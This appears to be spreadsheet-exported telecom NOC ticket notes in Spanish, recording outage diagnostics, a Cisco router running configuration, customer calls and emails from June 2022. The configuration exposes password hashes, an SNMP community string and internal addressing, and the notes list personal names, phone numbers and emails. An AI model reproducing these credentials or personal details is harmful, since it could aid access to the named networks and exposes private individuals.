PING -Q -C 100 -S 100 -M 5 -VPN PRONE 10.87.91.212
  PING 10.87.91.212: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.87.91.212 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 2/2/3 MS
RUTA IP:
PE: 10.179.28.75
DISPLAY IP ROUTING-TABLE VPN-INSTANCE PRONE 10.87.91.212
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : PRONE
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.87.91.212/32  DIRECT  0    0                 0.0.0.0         VLANIF43</t>
  </si>
  <si>
    <t>F4589730</t>
  </si>
  <si>
    <t xml:space="preserve">
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO SE PORCEDE A DEJAR EN ETAPAP PENDIENTE CLIENT EPARA DESCARTAR PROBLEMAS DE ENERGIA COMERCIAL.
PING HACIA ROUTER CPE:
PING -M 10 -Q -VPN BANRURAL 10.16.185.213
  PING 10.16.185.213: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.16.185.213 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.28.42
DISPLAY IP ROUTING-TABLE VPN-INSTANCE BANRURAL 10.16.185.213
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : BANRURAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.16.185.128/25  DIRECT  0    0             D   10.16.185.129   VLANIF2249			</t>
  </si>
  <si>
    <t>F4589751</t>
  </si>
  <si>
    <t>SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO PROBLEMA DE ENERGIA COMERCIAL SE PROCEDE CON CIERRE .
SE OBSERVA UNA ALARMA DE ENERGIA RECIENTE (HACE: 6 MINUTOS)
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.6(2)T1, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2016 BY CISCO SYSTEMS, INC.
COMPILED FRI 08-JUL-16 07:43 BY PROD_REL_TEAM
ROM: SYSTEM BOOTSTRAP, VERSION 15.0(1R)M16, RELEASE SOFTWARE (FC1)
CC_CREDOMATIC_GT_INTERNET_AGENCIA_0088 UPTIME IS 6 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM IMAGE FILE IS "FLASH0:C19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237L19A
2 GIGABIT ETHERNET INTERFACES
1 TERMINAL LINE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
245448K BYTES OF ATA SYSTEM COMPACTFLASH 0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*1  	  CISCO1941/K9          FJC2237L19A
SUITE LICENSE INFORMATION FOR MODULE:'C1900'
--------------------------------------------------------------------------------
SUITE                 SUITE CURRENT         TYPE           SUITE NEXT REBOOT
--------------------------------------------------------------------------------
FOUNDATIONSUITEK9     NONE                  NONE           NONE
SECURITYK9
DATAK9
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
------------------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE                  TECHNOLOGY-PACKAGE
              CURRENT              TYPE           NEXT REBOOT
------------------------------------------------------------------------
IPBASE        IPBASEK9             PERMANENT      IPBASEK9
SECURITY      NONE                 NONE           NONE
DATA          NONE                 NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_CREDOMATIC_GT_INTERNET_AGENCIA_0088#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 2582 BYTES
!
VERSION 15.6
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_CREDOMATIC_GT_INTERNET_AGENCIA_0088
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$HWAT$QCYY7AGOHFX4MUP1KHMFY1
!
NO AAA NEW-MODEL
ETHERNET LMI CE
!
!
!
!
!
!
!
!
!
!
!
!
IP CEF
NO IPV6 CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
LICENSE UDI PID CISCO1941/K9 SN FJC2237L19A
!
!
ARCHIVE
 LOG CONFIG
  HIDEKEYS
USERNAME GESTIONIP SECRET 5 $1$AXFB$SSXAEXXQ0LROXZ3JKYS.3.
!
REDUNDANCY
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.168.21 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/17400374T/_/
 BANDWIDTH 5120
 IP ADDRESS 10.87.24.22 255.255.255.224
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 186.151.36.233 255.255.255.252
 RATE-LIMIT INPUT 5120000 960000 1920000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 5120000 960000 1920000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 DUPLEX AUTO
 SPEED AUTO
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP ROUTE 0.0.0.0 0.0.0.0 10.87.24.1
!
LOGGING SOURCE-INTERFACE LOOPBACK5
!
!
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION INTERNET_2 CALLE 1-20, ZONA 2, CHIMALTENANGO, CHIMALTENANGO
ACCESS-LIST 88 REMARK MONITOREO_DEL_NOC
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
!
CONTROL-PLANE
!
!
BANNER LOGIN ^C----------------------------------------------------------------------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CREDOMATIC_GT_INTERNET_AGENCIA_0088#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 17 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 17 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 20 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (8192 BYTES):
*JAN  2 00:00:02.059: %SMART_LIC-6-AGENT_READY: SMART AGENT FOR LICENSING IS INITIALIZED
*JAN  2 00:00:02.367: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = IPBASEK9 AND LICENSE = IPBASEK9
*JUN  4 09:09:09.619: C3600_SCP_SET_DSTADDR2_IDB(184)ADD = 80 NAME IS EMBEDDED-SERVICE-ENGINE0/0
*JUN  4 09:09:23.079: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN  4 09:09:23.079: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN  4 09:09:24.199: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN  4 09:09:24.199: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN  4 09:09:25.375 UTC: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
*JUN  4 09:09:26.395 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
*JUN  4 09:09:27.331 UTC: %LINK-5-CHANGED: INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUN  4 09:09:27.331 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*JUN  4 09:09:28.359 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO DOWN
*JUN  4 09:09:28.363 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*JUN  4 09:09:28.779 UTC: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.6(2)T1, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2016 BY CISCO SYSTEMS, INC.
COMPILED FRI 08-JUL-16 07:43 BY PROD_REL_TEAM
*JUN  4 09:09:28.779 UTC: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_CREDOMATIC_GT_INTERNET_AGENCIA_0088 IS UNDERGOING A COLD START
*JUN  4 09:09:32.087 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN  4 09:09:33.087 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
CC_CREDOMATIC_GT_INTERNET_AGENCIA_0088#
SHOW CLOCK
*09:15:27.539 UTC SAT JUN 4 2022
CC_CREDOMATIC_GT_INTERNET_AGENCIA_0088#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.87.24.1              0   B443.2600.EDD5  ARPA   GIGABITETHERNET0/0
INTERNET  10.87.24.22             -   B08B.CFF5.EF80  ARPA   GIGABITETHERNET0/0
INTERNET  186.151.36.233          -   B08B.CFF5.EF81  ARPA   GIGABITETHERNET0/1
INTERNET  186.151.36.234          0   E0CB.BC19.D71A  ARPA   GIGABITETHERNET0/1
CC_CREDOMATIC_GT_INTERNET_AGENCIA_0088#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/17400374T/_/
GI0/1                          UP             UP       LAN DEL CLIENTE
LO5                            UP             UP       MONITOREO DEL CNOC
CC_CREDOMATIC_GT_INTERNET_AGENCIA_0088#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.87.24.22     YES NVRAM  UP                    UP
GIGABITETHERNET0/1         186.151.36.233  YES NVRAM  UP                    UP
LOOPBACK5                  10.212.168.21   YES NVRAM  UP                    UP
CC_CREDOMATIC_GT_INTERNET_AGENCIA_0088#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN INTERNET_GT_DEPTAL 10.87.24.22
  PING 10.87.24.22: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.87.24.22 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
RUTA IP:
PE: 10.179.28.32
DISPLAY IP ROUTING-TABLE VPN-INSTANCE INTERNET_GT_DEPTAL 10.87.24.22
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_GT_DEPTAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
    10.87.24.22/32  DIRECT  0    0                 0.0.0.0         VLANIF3750</t>
  </si>
  <si>
    <t>F4589762</t>
  </si>
  <si>
    <t>ENLACE OPERATIVO SIN PERDIDAS NI TIEMPOS ALTOS SE PROCEDE CON CIERRE
CT2#PING 192.168.137.150 REP 500 SI 500
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 500, 500-BYTE ICMP ECHOS TO 192.168.137.150, TIMEOUT IS 2 SECONDS:
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!
SUCCESS RATE IS 100 PERCENT (500/500), ROUND-TRIP MIN/AVG/MAX = 4/6/36 MS
PE 10.184.12.2
CT2#SHO IP ROUT  192.168.137.150
ROUTING ENTRY FOR 192.168.137.148/30
  KNOWN VIA "CONNECTED", DISTANCE 0, METRIC 0 (CONNECTED, VIA INTERFACE)
  REDISTRIBUTING VIA OSPF 1, OSPF 113, OSPF 167, OSPF 171, OSPF 123, OSPF 170, OSPF 120, OSPF 181, OSPF 180, OSPF 173
  ADVERTISED BY OSPF 1 SUBNETS ROUTE-MAP CONNECTED-TO-OSPF1
  ROUTING DESCRIPTOR BLOCKS:
  * DIRECTLY CONNECTED, VIA PORT-CHANNEL4.1467
      ROUTE METRIC IS 0, TRAFFIC SHARE COUNT IS 1
CT2#SHO RUN INT  PORT-CHANNEL4.1467
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 268 BYTES
!
INTERFACE PORT-CHANNEL4.1467
 DESCRIPTION MERCANTIL AGRICOLA ELEKTRA KM29.3 AMATITLAN INFOINTERNET 3MB C-0026400301
 ENCAPSULATION DOT1Q 1467
 IP ADDRESS 192.168.137.149 255.255.255.252
 SERVICE-POLICY INPUT RESTRICCION_3M
 SERVICE-POLICY OUTPUT RESTRICCION_3M
END
CT2#</t>
  </si>
  <si>
    <t>F4589871</t>
  </si>
  <si>
    <t>SE VALIDA QUE NO HAY SEGUIMIENTO POR PARTE DEL GESTOR Y NO HAY RESPUESTA EN LA COLA DE CORREOS, POR LO QUE NO APLICA A PC SE LE LLAMA AL PUNTO REMOTO AL 24207200  ID 1001256233 ATIENDE PABLO Y SE LE COMENTA COMO VE EL ATM Y COMENTA QUE  SIGUEN SIN TENER COMUNICACIÓN CON EL CAJERO,  SE LLAMA AL GESTOR RAMOS.MARLON MIENTRAS SE TRANSFERÍA CORTA LA LLAMADA EL PR SE VUELVE A LLAMAR ID 1001257570 SE TIENE EN LINEA Y SE DEJA CON EL GESTOR EN LINEA</t>
  </si>
  <si>
    <t>F4589893</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KELVIN COMENTA QUE YA CUENTA CON SERVICIO
1001234380
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 4818
DURACIÓN: 0:00:40
ESTADO: CONECTADA
DETALLES: 4818
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 4/06/2022 10:01:23</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KELVIN SE LE RETROALIMENTA QUEDA ENTERADO
1001225229
COLA:
NOMBRE: A: 0050376010216
NÚMERO: 0050376010216
DURACIÓN: 0:01:17
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050376010216
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 4/06/2022 09:22:54</t>
  </si>
  <si>
    <t>F4589897</t>
  </si>
  <si>
    <t>CLIENTE UBICA Y REINICIA SU PLANTA PBX PANASONIC, AL APAGAR SE OBSERVA QUE CAE EL PUERTO DEL MSAN. LUEGO DEL REINICIO SERVICIO CONTINUA CAIDO, POSIBLEMENTE SEA DAÑO DE LA PBX. SE ABRIRÁ WO PARA CERTIFICAR EL E1.</t>
  </si>
  <si>
    <t>EN LINEA CON CLIENTE RAQUEL MENJIVAR 78541069 ID: 1001234660</t>
  </si>
  <si>
    <t>F4589944</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A CL INDICANDO LO REALIZADO Y NOTIFICANDO DE LA SOLICITUD DE SR MALAQUIAS DE MANTENER EN MONITOREO HASTA LAS 07:00 HRS --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: DOMINGO, 5 DE JUNIO DE 2022 00:27
PARA: STEVEN MARQUEZ (VENDOR) &lt;STEVEN.MARQUEZ@WALMART.COM&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; NOE PEREZ (VENDOR) &lt;NOE.PEREZ1@WALMART.COM&gt;; JEFFERSON ARCE (VENDOR) &lt;JEFFERSON.ARCE@WALMART.COM&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE CAÍDO DE DF MORALES ID: 344400169
BUENOS DÍAS ESTIMADO SR. STEVEN.
                RESPECTO A SU SOLICITUD, PERSONAL TÉCNICO DE CAMPO REPARO DAÑO EN FIBRA ÓPTICA.
ADJUNTO CORREOS DE SEGUIMIENTOS ANTERIORES EN LA COLA ORIGINAL, A SOLICITUD DEL SR. MALAQUIAS SE VALIDARA CIERRE A LAS 07:00 HRS.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 2243-7253 CONTESTA EL SEÑOR JEFERSON CONFIRMA SERVICIO ESTABLE Y AUTORIZA CIERRE DEL TICKET **
ID 1001468331
**</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DE CLIENTE INDICANDO ENLACE OK, PIDE MONITOREO PARA MAÑANA A LAS 07:00AM; POSTERIOR AL CIERRE DEL TICKET, SE LE DEBE HACER LA SOLICITUD DEL RFO.</t>
  </si>
  <si>
    <t>SE HABLÓ CON MALAQUÍAS PANJOJ/CLIENTE 22437253 INDICA ENLACE OK, PIDE MONITOREO PARA MAÑANA A LAS 07:00AM</t>
  </si>
  <si>
    <t>F4589949</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE A MANUEL FLORES AL 45426202  ID 1001236257 PARA EL SEGUIMIENTO Y SE LLAMA AL 8126 ID 1001236917 / 1001236844  PERO NO INGRESA LA LLAMADA ALGÚN GESTOR Y SE ESCALA CON JUAN MANUEL CARDONA AL 41287321 ID  1001236972 SE LE BRINDA LA INFORMACION Y TRANSFIERE CON EL GESTOR SAMUEL EN  LINEA  Y SE DEJA CON EL PR</t>
  </si>
  <si>
    <t>*** SE ENVÍAN DATOS DE PERSONAL A CLIENTE ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: SÁBADO, 4 DE JUNIO DE 2022 11:28
PARA: DANIEL@DONCARNITAS.COM &lt;DANIEL@DONCARNITAS.COM&gt;; 'NOC CORPORATIVO' &lt;NOC@REDOPTIMA.NET&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RESTAURANTES DON CARNITAS, S.A. -- 839800003T -- F4589949
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DE LA FALLA, FAVOR DE SU APOYO EN GESTIONAR PERMISOS PARA EL PERSONAL DESCRITO A CONTINUACIÓN, ELLO PARA LA VERIFICACIÓN DEL SERVICIO, POR POSIBLE CORTE DE FO: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F4589960</t>
  </si>
  <si>
    <t>CLIENTE GILBERTO RAMIREZ 50254661746 VALIDA QUE EL SERVICIO YA SE ENCUENTRA EN FUNCIONAMIENTO, SOLICITA SE VALIDE A LAS 12 DEL MEDIO DIA. ID:1001233699</t>
  </si>
  <si>
    <t>F4589984</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 MENCIONA QUE AUN ESTAN PENDIENTE DE RESPUESTA POR PARTE DE CLIENTE FINAL POR LO QUE SOLICITAN  VALIDAR A LAS 21:00 HORA MEXICO (20:00 HRS GT)
-ID 1001604652</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 525551745290  CONTESTA LA SEÑORITA LAURA INDICA QUE TRANSFERIRA LA LLAMADA CON LA SEÑORITA KARINA RUIZ PERO NO RESPONDEN DEJAN EN ESPERA Y NO RETOMAN LLAMADA **
-ID 3001070724
**</t>
  </si>
  <si>
    <t>F4589997</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A CL PARA VALIDAR --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: DOMINGO, 5 DE JUNIO DE 2022 05:13
PARA: PERLA MARINA ESTRADA PACAY &lt;PERLA.ESTRADA@CLARO.COM.GT&gt;; PABLO MIGUEL ERNESTO JUAREZ HERNANDEZ &lt;PABLOM.JUAREZ@CLARO.COM.GT&gt;; JUAN ELIAS SIERRA ORTIZ &lt;JUAN.SIERRA@SOMOSCMI.COM&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;; BYRON ESTUARDO RUIZ SALAZAR &lt;BYRON.RUIZS@SOMOSCMI.COM&gt;
CC: NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; CMIA_REDES &lt;CMIA_REDES@SOMOSCMI.COM&gt;; RICARDO ENRIQUE ARGUETA GIRON &lt;RICARDO.ARGUETAG@SOMOSCMI.COM&gt;; MANUEL GREGORIO COLMENARES AVILA &lt;MANUEL.COLMENARES@SOMOSCMI.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;
ASUNTO: RE: FALLA ENLACE DE INTERNET CAMPERO 113
ESTIMADO SR. SIERRA.
                DE NUESTRO LADO EL ENLACE CONTINUA ESTABLE, PODRÍA APOYARNOS VALIDANDO EL FUNCIONAMIENTO DESDE SU LADO E INDICARNOS SI PODRÍAMOS CERRAR NUESTRO TICKET.
CUALQUIER CONSULTA QUEDAMOS  A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LLAMÓ A CENTRAL 504 94560221 PARA QUE NOS BRINDEN TELS DE PR, NO CONTESTA; SE LE ENVÍA CORREO SOLICITÁNDOLE APOYO:
ASUNTO: RE: FALLA ENLACE DE INTERNET CAMPERO 113</t>
  </si>
  <si>
    <t>F4590002</t>
  </si>
  <si>
    <t>SE VALIDA QUE AUN SIGUEN REALIZANDO LAS PRUEBAS LÓGICAS Y TICKET NO APLICA PC SE CAMBIA A WIP SE NOTIFICA AL GESTOR
 RAMOS.MARLON VIS SKYPE  SI HAY ALGO PENDIENTE CON EL CLIENTE NOTIFICAR PARA EL APOYO.</t>
  </si>
  <si>
    <t>F4590005</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE ANIBAL
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;
ENVIADO: MARTES, 7 DE JUNIO DE 2022 19:58
PARA: TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;
ASUNTO: ENLACE REINCIDENTE PARA CLIENTE "CC_BANRURAL_GT_AGENCIA_0892"
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL SERVICIO, SE OBSERVA QUE SE HA ALARMADO DE FORMA REINCIDENTE, EN DIAGNOSTICO SE OBSERVA QUE LA CAUSA DE LA GENERACIÓN DE FALLAS SON REINICIOS SOBRE LOS EQUIPOS DE RED, SE LLAMÓ A PERSONAL DE LA AGENCIA ARIEL ROSALES QUIEN INDICO QUE APROXIMADAMENTE 2 MESES EL INVERSOR EN AGENCIA SE DAÑO POR LO QUE SE REPORTO A LA CENTRAL PARA REEMPLAZAR EL INVERSOR DAÑADO, SOLICITAMOS SU ACOSTUMBRADO APOYO INDICANDO SI SE TIENE UN TIEMPO ESTIMADO PARA LAS REPARACIONES RESPECTIVAS PARA SOLVENTAR DE RAÍZ TEMA DE LOS REINICIOS RECURRENTES EN EQUIPOS DE RED.
TICKET: F4590005
ID: 89001814T
IDENTIFICADOR DEL CLIENTE:  CC_BANRURAL_GT_AGENCIA_0892
UBICADO EN:  LOCAL DEL EDIFICIO MUNICIPAL PASACO, JUTIAPA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4590011</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  DENIS RODRIGUEZ 54780107 MENCIONA QUE SE COMUNICARA CON LA ADMINISTRACION DEL CONDOMINIO PORQUE NO DEJARON TRABAJAR A PERSONAL TECNICO
CLIENTE SOLICITA LLAMADA EN 15 MIN
-ID 1001487167</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARTA CANEL - 47696308 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001497176</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DENIS RODRIGUEZ 54780107 MENCIONA QUE LOS PERMISOS YA ESTAN AUTORIZADOS POR LA ADMINISTRACION DEL CONDOMINIO, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 1001483266</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DENIS RODRIGUEZ 54780107 MENCIONA QUE YA OBSERVA EL SERVICIO OPERATIVO PERO NO LLEGA AL ANCHO DE BANDA, SE LE INDICA QUE AUN ESTA EN PROCESO LA OT PARA EL INCREMENTO DE ANCHO DE BANDA
CLIENTE INDICA QUE DARA SEGUIMIENTO CON SU EJECUTIVO
-ID 1001497760</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DENIS RODRIGUEZ 54780107 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001493496</t>
  </si>
  <si>
    <t>F4590014</t>
  </si>
  <si>
    <t>SE ESTA EN LINEA CON EL CLIENTE JORGE OVIEDO 54929812   QUIEN PROCEDE A UBICAR EQUIPO ASMI52. LLAMADA DESDE VI-VO</t>
  </si>
  <si>
    <t>F4590046</t>
  </si>
  <si>
